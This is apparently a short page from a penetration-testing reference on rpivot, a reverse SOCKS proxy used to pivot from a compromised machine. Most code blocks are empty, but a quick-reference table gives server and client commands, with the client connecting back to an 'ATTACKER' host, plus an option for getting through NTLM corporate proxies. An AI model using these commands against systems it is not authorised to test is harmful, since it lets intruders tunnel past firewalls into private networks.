Documentation Index
Fetch the complete documentation index at: https://docs.bytejmp.com/llms.txt
Use this file to discover all available pages before exploring further.
Overview
rpivot creates reverse SOCKS proxy — target connects back to attacker. Useful when target can reach attacker but not vice versa (firewall/NAT).Download
Setup
Attacker (Server)
Target (Client)
127.0.0.1:1080.
Transfer Client to Target
Use with ProxyChains
Through NTLM Proxy
If target is behind corporate proxy with NTLM auth:Notes
- Requires Python 2 on target
- SOCKS4 only (not SOCKS5)
- Single-hop pivot
- Lightweight — just
client.pyneeded on target
Quick Reference
| Task | Command |
|---|---|
| Server | python2 server.py --server-port 9999 --proxy-port 1080 |
| Client | python2 client.py --server-ip ATTACKER --server-port 9999 |
| Proxy type | SOCKS4 on 127.0.0.1:1080 |
| NTLM proxy | Add --ntlm-proxy-ip/port/domain/user/pass |